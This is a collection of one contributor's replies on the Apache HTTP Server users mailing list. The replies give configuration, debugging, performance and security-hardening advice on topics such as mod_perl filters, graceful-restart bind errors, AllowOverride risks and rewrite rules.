http://www.modsecurity.org/

but I haven't used it, and really the buggy programs should be fixed
anyways.  Still, it might help.

Good luck,

ScottG.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Apache running with PID of 0

[Scott Gifford]

"Duncan Drury" <[EMAIL PROTECTED]> writes:

[...]

> one of the symptoms is Apache ends up running with a PID of 0 (or
> shows up as doing so when I ps -aux | grep httpd)

Can you paste the output of "ps -aux |head -1" and "ps -aux |grep
httpd" which shows this into an email back to the list?

Unless FreeBSD uses PID 0 for something unusual, having that PID would
have to be a kernel bug.  Unfortunately I don't know FreeBSD that
well; maybe somebody on one of the FreeBSD mailint lists could explain
it.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Re: PerlSetEnv in .htaccess ?

[Scott Gifford]

"abhishek jain" <[EMAIL PROTECTED]> writes:

> Pl. do not mind i am posting again within an hour, but the problem is taking 
> my
> nerves, is there a way to go forward i believe the webhost is not allowing to
> set me PerlSetEnv is there another method to do the same,

You could try just using SetEnv.

You could also edit your scripts to begin with:

$ENV{EMBPERL_OBJECT_BASE}='_base.epl'

Are you using mod_perl or standard CGI scripts?

There might be a better way supported by your Web hosting provider;
you could ask them for their suggestions.

Good luck!

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Re: PerlSetEnv in .htaccess ?

[Scott Gifford]

"abhishek jain" <[EMAIL PROTECTED]> writes:

> On second thoughts is there a method by which i can execute some
> piece of code to execute even before my scripts are called, remember
> i am on a shared host,

I don't know of a way to do exactly this on a shared host.  If your
provider supports mod_perl they must support things like PerlSetEnv,
you really should talk to them and see what they say.

Setting the environment variable in a BEGIN block of your Perl code
might be enough to work, though.

Good luck,

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Cannot access "localhost"

[Scott Gifford]

Ben Schonle <[EMAIL PROTECTED]> writes:

> *In Short:
> - After fresh installation of apache2 trying to access localhost or
> 127.0.0.1 is not working

Hi Ben,

What error do you get when you try to connect?  What happens if you
type "telnet 127.0.0.1 80" on the Web server to connect directly?

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] About ListenBackLog and MinspareThread

[Scott Gifford]

"Arnab Ganguly" <[EMAIL PROTECTED]> writes:

> Hi All,
> My Apache server is heavily loaded.I am using Apache 2.2.8 on Red-Hat 3 with
> MPM=worker.Can I reduce the load by reducing the value of
> ListenBackLog? 

No, at best that will save you a small amount of memory in your TCP
stack, at worst it will cause you to lose connections.

> What is the impact on the webserver if I keep MinSpareThread 1?

This is likely to hurt performance in most cases.  Apache keeps spare
threads around so they will be ready as soon as a request comes in.
The lower MinSpareThread is, the more likely it will have to create a
new thread for a new client, which is expensive.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Prefetch

[Scott Gifford]

"Krist van Besien" <[EMAIL PROTECTED]> writes:

[...]

> What I now want to do, is have apache (or something else) look at the
> content of the response that comes from the backend, and _prefetch_
> all the images that are linked in it, so that when the request for the
> images comes they are already cached.
>
> Any ideas, modules or products that could help here?

That's an interesting idea.  I have written mod_perl code to modify a
Web page on the way through, to rewrite links to a new location.  It
went something like this in httpd.conf:


  PerlModule Apache::SiteMoved
  PerlModule Apache::Filter
  SetHandler perl-script
  PerlSetVar Filter On
  PerlHandler Apache::SiteMoved


and like this in lib/perl5/Apache/SiteMoved.pm:

package Apache::SiteMoved;

use Apache::Constants qw(:common :response);

sub handler
{
my $r = shift;

$r = $r->filter_register();
$r->deterministic(1);

my ($fh, $status) = $r->filter_input(); # Get status information
return $status unless $status == OK;
while (<$fh>)
{
s/(?:www\.)?old-site-name\.(?:com|net|org)/www.new-site-name.com/g;
print;
}
return $status;
}

If you could hook up a filter like this in the proxy, it could parse
the HTML, find IMG SRC commands, then fork off to a background process
to get them and put them in the cache (the easiest way would be to
just send requests for them to the Web server).

Hope that helps get you started,

-Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Is it possible to keep a module running after closing a connection?

[Scott Gifford]

"Brown Chris-CCB034" <[EMAIL PROTECTED]> writes:

> I'm looking at a situation where we'd want to close a connection (for example
> the message size is too large) but we'd like to keep the thread active so that
> we can perform some other steps before releasing the thread.  Is this 
> possible?
>   I've been looking through the apache header files and nothing stands out to
> me as a method that would immediately close the connection without releasing
> the thread.

In the process model, you just fork() twice and continue your work in
the grandchild process.  Not sure with the threaded model, but
probably you could just create another thread to do your work, and set
it up to not require joining.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Unsecuring a URL

[Scott Gifford]

Mark Mcdonald <[EMAIL PROTECTED]> writes:

[...]

> There are no errors, the authentication prompt just remains after apache is 
> restarted.
>
> I am testing on a box using Basic auth, with the following file in 
> /etc/apache2/sites-enabled:
>
> 

[...]

> 
> Order allow,deny
> Allow from any
> Satisfy any
> 

[...]

The problem may be that Apache is rewriting /node/feed to 
/index.php?q=node/feed,
so your Location rule above is getting ignored.  You could try
"Location /index.php?q=node/feed", but I doubt that will work; I don't
think you can set different rules depending on the query part of a
URL.

A few ideas: mod_rewrite can match these sorts of URLs and set
environment variables.  You might be able to trick later parts of
Apache into allowing you in, for example by overriding REMOTE_USER or
AUTH_TYPE.  If you allow one host, like 127.0.0.1, maybe you could
override REMOTE_HOST, or REMOTE_ADDR.  If 127.0.0.1 is allowed, you
could also try rewriting with the [P] option which will proxy the
request, and simply proxy it back to yourself at localhost.  The proxy
request will come from 127.0.0.1, and so should be allowed.

You could write a very simple authentication module that would run
before basic auth, and always authenticate users using this URL.
Otherwise it would decline the auth and let basic auth handle it.

You could write a small proxy or CGI program at a different,
unauthenticated URL to access this page (by running the script
directly, or by accessing it over HTTP in a way that your Web server
will allow).

You could also try asking in a Drupal forum.  I suspect their answer
will be to use Drupal's authentication instead of Apache; then you can
simply allow anonymous access to this page with a checkbox.

Good luck!

-Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Re: Apache Security Problem

[Scott Gifford]

Andre Hübner <[EMAIL PROTECTED]> writes:

> Hi,
>
>>> You can do restrictions of particular options using the technique
>>> shown her=
>>>e:
>>>http://httpd.apache.org/docs/2.2/howto/htaccess.html#how
>
>>>But I have a feeling that there are other ways around your separation.
>>>It depends on exactly the details of how you are running your scripts.
>
>>> Joshua.
>
> I only can repeat. The way how to create the symlink is
> irrelevant. With Scriptingtechniques no reading of the files of other
> user is possible. (openbasedir/permission denied etc.) 

On most Apache configurations, a script written by any user can read
any files that Apache can read.  It runs as the Apache user (usually
apache or httpd), and can read any files accessible to that user.

If you're running something like suEXEC, though, you're right that the
symlinks will be accessed with a different user than scripts, and
could provide access to files they would not otherwise have access to.
Hopefully one of the other suggestions in this thread has allowed you
to restrict symlink following without breaking your .htaccess files.

Good luck!

-Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Heavy Wait on My Shoulders

[Scott Gifford]

amiribarksdale <[EMAIL PROTECTED]> writes:

> About the only strange thing in my debug-level error logs is 
>
> (32)Broken pipe: client stopped connection before rwrite completed

That's an interesting clue. It looks like it is in the middle of a URL
rewrite (mod_rewrite) while it is stuck.  Maybe that's where the
problem is.  You can try turning on the RewriteLog and see what's up.

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] Heavy Wait on My Shoulders

[Scott Gifford]

"Ben Ricker" <[EMAIL PROTECTED]> writes:

> If I remember his previous email, he said that he saw this after he
> his the 'Reload' button which would explain it.

It seems to me that you would have to hit Reload very fast to catch
Apache in the middle of a mod_rewrite, unless the rewrite was very
slow or looping.

Scott.


>
> Ben
>
> On Fri, May 30, 2008 at 9:53 AM, Scott Gifford
> <[EMAIL PROTECTED]> wrote:
>> amiribarksdale <[EMAIL PROTECTED]> writes:
>>
>>> About the only strange thing in my debug-level error logs is
>>>
>>> (32)Broken pipe: client stopped connection before rwrite completed
>>
>> That's an interesting clue. It looks like it is in the middle of a URL
>> rewrite (mod_rewrite) while it is stuck.  Maybe that's where the
>> problem is.  You can try turning on the RewriteLog and see what's up.
>>
>> Scott.
>>
>> -
>> The official User-To-User support forum of the Apache HTTP Server Project.
>> See http://httpd.apache.org/userslist.html> for more info.
>> To unsubscribe, e-mail: [EMAIL PROTECTED]
>>   "   from the digest: [EMAIL PROTECTED]
>> For additional commands, e-mail: [EMAIL PROTECTED]
>>
>>
>
>
>
> -- 
> Thanks,
>
> Ben Ricker
>
> --
>
> I use my cat's name for a password: he is called [EMAIL PROTECTED] and I
> change his name every 60 days.
>
> -
> The official User-To-User support forum of the Apache HTTP Server Project.
> See http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: [EMAIL PROTECTED]
>"   from the digest: [EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [EMAIL PROTECTED] IP based virtual hosting and security

[Scott Gifford]

"César Leonardo Blum Silveira" <[EMAIL PROTECTED]> writes:

[...]

> So, my question is: how safe is it to let the other interface listen,
> even if it will not respond correctly to any request? What is the
> potential for security vulnerabilities in the 8080 port of the other
> interface?

There actual threat from doing this is very small if both IP addresses
are publicly accessible.  Connecting to an address with no site
configured for it will probably exercise a different code path than
connecting to an address with a site, but it's likely to be small and
not very risky.

However, if your Web server is not public, or you are doing any kind
of IP address-based access control (perhaps at a firewall), you would
want to be careful to ensure that the same access rules applied to
both of your IP addresses.  Any public Web server represents some
risk, and if that alternate IP address bypasses your access control
and makes your otherwise private Web server public, it could be a bit
risky.

Bottom line: It's probably very slighly safer to avoid listening on
that IP address at all, but only very slightly.

Hope this helps,

Scott.

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]

Re: [us...@httpd] graceful restart occasionally gives "could not bind" error

[Scott Gifford]

I don't have an answer for you, but here are a few troubleshooting tips I
have found helpful.

If you can make it happen pretty often, you could try doing an
strace/truss/ktrace (I think it's ktrace on BSD) of the process to see what
system calls it's making and exactly which is failing.  You could also try
running "netstat -an |grep :443" right before and after you run it to see if
there's anything else listening on port 443.

One possibility is that the SO_REUSEADDR socket option somehow isn't being
set, which would be visible in a trace.

Another possibility may be that a child process is doing something with the
socket that prevents it from being closed.  You could look in the logs
between restarts and see if that gives a clue.  Maybe there's one script
that is triggering this, for example.  If you tried a graceful restart every
minute or less, the log interval might be small enough to give you useful
information.

You could also try systematically disabling things and see if that helps,
starting with any modules that aren't used.

I have had similar problems on earlier versions of Apache but was never able
to figure them out.  They would only happen once or twice a year, so I
wasn't able to do much troubleshooting.  I know that doesn't help, but maybe
it's nice to know that you're not the only one who has seen problems like
this.

Hope this helps!

-Scott.


On Thu, May 27, 2010 at 10:17 AM, Jeff Trawick  wrote:

> On Wed, May 26, 2010 at 9:22 AM, Raphael Bauduin 
> wrote:
> > Hi,
> >
> > With an apache 2.2 running on FreeBSD
>
> which level of Apache? (2.2.9 had a change in this area of processing)
> which level of FreeBSD?
>
> >, I occasionally get a
> problem
> > with a graceful restart.
> > Issuing the command apachectl graceful results in these messages in
> > the error log:
> >
> > [Wed May 26 14:45:48 2010] [notice] Graceful restart requested, doing
> restart
> > [Wed May 26 14:45:53 2010] [warn] module dav_module is already loaded,
> skipping
> > [Wed May 26 14:45:53 2010] [crit] (22)Invalid argument: make_sock: for
> > address [::]:443, apr_socket_opt_set: (IPV6_V6ONLY)
> > (48)Address already in use: make_sock: could not bind to address
> 0.0.0.0:443
> > no listening sockets available, shutting down
>
> hmmm...  dunno why setting that socket option is failing (the first
> [crit] message)
>
> if you don't need IPv6, change your Listen directive from "Listen 443"
> to "Listen 0.0.0.0:443" to work around the problem, whatever it is
>
>
> >
> > or this
> >
> > [Wed May 26 15:02:52 2010] [notice] Graceful restart requested, doing
> restart
> > [Wed May 26 15:02:57 2010] [warn] module dav_module is already loaded,
> skipping
> > (48)Address already in use: make_sock: could not bind to address [::]:443
> >
> >
> >
> > This error is not systematic, but it makes the command unreliable and
> > unusable in a cron task.
> >
> > Any hint as to what causes this problem?
> >
> > Thanks in advance!
> >
> > Raph
> >
> >
> >
> > --
> > Web database: http://www.myowndb.com
> > Free Software Developers Meeting: http://www.fosdem.org
> >
> > -
> > The official User-To-User support forum of the Apache HTTP Server
> Project.
> > See http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> >   "   from the digest: users-digest-unsubscr...@httpd.apache.org
> > For additional commands, e-mail: users-h...@httpd.apache.org
> >
> >
>
>
>
> --
> Born in Roswell... married an alien...
>
> -
> The official User-To-User support forum of the Apache HTTP Server Project.
> See http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
>   "   from the digest: users-digest-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>

Re: [us...@httpd] I/O accounting for all processes?

[Scott Gifford]

On Tue, Jun 15, 2010 at 5:33 PM, Jakov Sosic  wrote:

> I'm interested in measuring I/O that all apache processes are
> generating.


I used mod_logio to solve a similar problem not too long ago, with good
success:

http://httpd.apache.org/docs/2.0/mod/mod_logio.html


Scott.

Re: [us...@httpd] Apache getting stuck with all workers in a BUSY_READ state

[Scott Gifford]

On Tue, Jun 15, 2010 at 1:02 PM, David Fallon  wrote:
[ ... ]

> Any suggestions on a solution, or how I might get more info out of
> apache as to what it's doing while everyone's in the read state?


I would try using strace (or ktrace or truss depending on your OS) on the
processes to see what they are doing.  Between that and lsof you should be
able to tell what the process is blocked reading.

Hope this is helpful,

Scott.

Re: [us...@httpd] Apache getting stuck with all workers in a BUSY_READ state

[Scott Gifford]

On Wed, Jun 16, 2010 at 9:33 AM, David Fallon  wrote:

> Thanks for the suggestion, but unfortunately I've tried that - truss
> in this case is attaching post whatever it's blocking on (so I just
> see it sleeping), and I haven't yet waited out the problem to see what
> happens when/if whatever's blocking times out. Any other ideas?
>

truss reports nothing?  Not that it's waiting in a blocking operation?  On
the systems I'm familiar with at least, that means it's not waiting for I/O,
but is off doing something else.  That would indicate it's not waiting for a
proxy response or a user request, but something else altogether.  I'm not
sure what your system is, so its truss may behave differently, you could do
some quick experiments if you're not sure either.

The suggestion to take a look in a debugger is a good one if your Apache has
debugging symbols.  That may be a good next step.

Good luck!

-Scott.

Re: [us...@httpd] I/O accounting for all processes?

[Scott Gifford]

On Wed, Jun 16, 2010 at 12:16 PM, Jakov Sosic  wrote:

> On 06/16/2010 06:49 AM, Scott Gifford wrote:
> > On Tue, Jun 15, 2010 at 5:33 PM, Jakov Sosic  > <mailto:jakov.so...@srce.hr>> wrote:
> >
> > I'm interested in measuring I/O that all apache processes are
> > generating.
> >
> >
> > I used mod_logio to solve a similar problem not too long ago, with good
> > success:
>
> But it seems that this module records network I/O and not the filesystem
> I/O. Although it's good to know this too, I would prefer more the
> filesystem I/O currently :)
>

Ah, I see.  I haven't done that before, but I can offer random suggestions.
 :-)

You probably know this already, but if Apache is the main or only thing
running on this server, tools like iostat and sar can get the information
you are after on a system-wide basis.  That would be by far the easiest
solution.

Otherwise, if you need to isolate Apache from other parts of the system, it
looks like the information you are after is in /proc/PID/io on Linux.  You
could find all of Apache's PIDs, poll this information periodically, log it,
then calculate usage/second over your log interval.  Tools like mrtg are
designed to manage this sort of data.  iotop might be helpful too.  You
could probably also install some custom request handlers from a module or
mod_perl (in a 
PerlLogHandler<http://perl.apache.org/docs/2.0/user/handlers/http.html#PerlLogHandler>or
PerlCleanupHandler<http://perl.apache.org/docs/2.0/user/handlers/http.html#PerlCleanupHandler>)
to read this file and record the I/O increase after every request.  This
might help work around your concern about PIDs changing.

Those are the places I would start at least.  Hope this is helpful,

-Scott.

Re: [us...@httpd] AllowOverride: Pros and Cons

[Scott Gifford]

On Thu, Jul 8, 2010 at 2:28 AM, James Corteciano wrote:
[ ... ]

> I am just concern about security matters that will produce if I will give
> the user full access on .htaccess (AllowOverride All) on their webroot?
>

AllowOverride All effectively allows a user who can create a .htaccess file
to access any file the Web server can read, and execute any code they would
like to as the Web server user.  From a security perspective it's equivalent
to giving the user a shell as the Web server user.  That may or may not be
consistent with your security objectives.

Hope this helps!

-Scott.

Re: [us...@httpd] debugging websites running on Apache?

[Scott Gifford]

On Fri, Nov 19, 2010 at 7:00 AM, Tomasz Chmielewski  wrote:

> How do you debug websites running on Apache?
>

I have a few tricks I use.

First, I try to write my applications so they can be run from the
commandline.  That means when they misbehave, I can run them directly under
strace or a debugger to see what's going on.

Others have suggested using the Xdebug profiler, but for what you are
looking at, the debugger might be more helpful.  You an just step through
the code one line at a time.

You can try running a Web server on an alternate port that only you use, so
that there will be no noise from other clients.

Sometimes I will have my applications write their PID to the error_log then
sleep for 30 seconds or so.  I can get their PID then and start an strace on
just that process.  You can limit this so they only do it when a request has
a particular parameter, comes from a particular IP address, etc.

Hope some of these techniques are helpful to you,

Scott.

Re: [users@httpd] HTTP authentication using HTTP

[Scott Gifford]

On Tue, Jan 11, 2011 at 4:52 AM, Anders Melchiorsen  wrote:

> Hi.
>
> I want to password protect some directories by forwarding the HTTP
> authentication to a different URL. That is, rather than using LDAP or MySQL
> as a backend, I want to use a CGI script (possibly on a different server).
>

You can do this with mod_perl and one of these modules:

http://search.cpan.org/~chansen/Authen-Simple-HTTP-0.2
http://search.cpan.org/~chansen/Authen-Simple-0.4


Both can be used directly in the Apache configuration file and behave like
Apache authentication handlers.

The second module requires a bit more work to set up, but can support
caching, which can be useful depending on your setting.

I have been using a module which is a slightly customized blend of the two
for several years now with great success.

Hope this helps!

Scott.

Re: [users@httpd] giving write permissions to apache user on some folders in document root

[Scott Gifford]

On Thu, Feb 3, 2011 at 2:48 PM, James Godrej  wrote:
[ ... ]

> I am not at all convinced by the idea of giving permissions to read,write
> and
> execute as these Learning Management Systems say.
> Let me know what you people have to say?
> What is the best practise in such situations?
>

James,

You are right that making these directories writable by the Web server or
world-writable increases your security risk, since in many cases it allows
escalating the ability to write to the filesystem to the ability to execute
arbitrary code as your Web server user.

One option for mitigating this is to carefully configure the Apache-writable
directories so they will not execute content, by limiting the types of
content allowed there, disabling CGI execution, making sure .htaccess files
are ignored, etc.  Generally the content of these directories will be static
images and so won't need to be executed.

You may find you are able to run the content-management part of the system
using a different Apache instance than the user-viewable part.  That would
let you make these directories writable by the admin Apache instance but not
the public one, then protect that Apache instance with firewall rules, a
strong password, SSL, etc.  This would most likely require a bit of work.

Finally, you can carefully review the security of these applications, their
history of security incidents, etc. to determine if they are reliable enough
to be trusted with this sort of access.  If not, try to find one that is.

Sorry there are no simple answers there, but hopefully it is helpful.

--Scott.

Re: [users@httpd] Single Value Authentication Module

[Scott Gifford]

On Mon, Sep 12, 2011 at 1:01 PM, J.Lance Wilkinson  wrote:
[ ... ]

>
>Actually, I *AM* trying to AUTHENTICATE with it.  I have a directory
>that contains content that is to only be accessed by individuals who
>have paid a specific fee.   I want HTTPD to only offer that
> directory
>and its content to individuals who have gotten thru the
> authentication.
>

I have had great luck with clever authentication tricks using mod_perl.
 See:

   - http://perl.apache.org/docs/2.0/api/Apache2/Access.html
   - http://search.cpan.org/~mschout/Apache-AuthCookie-3.18/
   - http://search.cpan.org/~chansen/Authen-Simple-0.4/
   - http://search.cpan.org/~kgoldov/Apache2-AuthAny-0.201/

Hope this helps,

-Scott.

Re: [users@httpd] Vanity URL Rewrites Best Practices?

[Scott Gifford]

On Mon, Oct 3, 2011 at 2:25 PM, Nick Tkach  wrote:

> Does anyone have any pointers/suggestions on the best way to do vanity url
> rewrites?
>
> For example,
>
>
>
> http://foo.com/mmh/maintenance_plan/tip?contentCategoryType=MaintenanceTip&id=%2Fwww%2Favm_webapps%2Fmmh%2Fmaintenance-tips%2Fcontent%2Fafter_blizzard.xml
>
>
> Being sent to
>
>
>  http://foo.com/mmh/articles/authored/after-blizzard


Drupal  uses rules like this:

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !=/favicon.ico
RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]

That is, "if there is no matching file or directory, redirect to an
index.php script and pass the URL in as the parameter q".  That script then
looks up the URL in a database and serves up the right content.

That is a pretty common approach.

Hope this helps,

-Scott.